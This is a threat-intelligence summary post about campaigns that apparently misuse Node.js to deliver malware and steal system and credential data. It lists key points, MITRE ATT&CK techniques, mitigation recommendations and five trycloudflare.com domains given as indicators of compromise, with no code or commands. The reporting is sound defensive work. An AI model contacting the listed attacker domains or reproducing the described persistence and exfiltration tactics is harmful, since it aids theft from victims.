FOCUS MODE
EXTRACT IOC
Threat Research

Threat actors misuse Node.js to deliver malware and other malicious payloads

admin
Threat actors misuse Node.js to deliver malware and other malicious payloads
Microsoft Defender Experts have reported malicious campaigns utilizing Node.js to deliver malware and facilitate information theft. This emerging trend shows a shift in threat actor techniques that blend malware with legitimate applications, indicating the growing use of Node.js in cyber threats. Affected: cybersecurity, software development

Keypoints :

  • Microsoft Defender Experts have observed Node.js being used for malware delivery and data exfiltration since October 2024.
  • The adoption of Node.js by threat actors reflects an evolution in malicious tactics beyond traditional scripting languages.
  • Malvertising campaigns lure victims to download malware disguised as legitimate cryptocurrency trading software.
  • The attacks use a malicious DLL to persist in the target environment and gather system information.
  • Defense evasion tactics include creating scheduled tasks to hide PowerShell executions from security detections.
  • Data collected from victims includes system and BIOS information, which is then sent to command-and-control servers.
  • Inline JavaScript execution techniques have been observed, wherein malicious scripts execute through Node.js without being saved to files.
  • Recommendations to mitigate risks include user education, monitoring Node.js executions, and enforcing PowerShell logging.

MITRE Techniques :

  • T1189 – Drive-by Compromise: Malware is downloaded from malicious websites, such as fake cryptocurrency trading websites.
  • T1053.005 – Scheduled Task/Job: Ensures persistence by scheduling tasks or modifying registry settings.
  • T1564.001 – Hidden Artifacts: Bypasses security controls using hidden files.
  • T1027 – Obfuscated Files or Information: Uses obfuscation to hide malicious actions.
  • T1082 – System Information Discovery: Gathers detailed system information, including hardware and software data.
  • T1003 – OS Credential Dumping: Extracts system credentials and browser data.
  • T1005 – Data from Local System: Captures system details, installed software, and network information.
  • T1071.001 – Application Layer Protocol: Web Protocols: Uses web-based protocols for data exfiltration.
  • T1041 – Exfiltration Over C2 Channel: Sends collected data to remote servers through HTTP POST.

Indicator of Compromise :

  • [Domain] sublime-forecasts-pale-scored.trycloudflare.com
  • [Domain] washing-cartridges-watts-flags.trycloudflare.com
  • [Domain] investigators-boxing-trademark-threatened.trycloudflare.com
  • [Domain] fotos-phillips-princess-baker.trycloudflare.com
  • [Domain] casting-advisors-older-invitations.trycloudflare.com

Full Story: https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/

Views: 32

Tags: XDR, PROXY, CLOUD, MONITOR, SOCIAL ENGINEERING, HUNTING, INITIAL ACCESS, EMAIL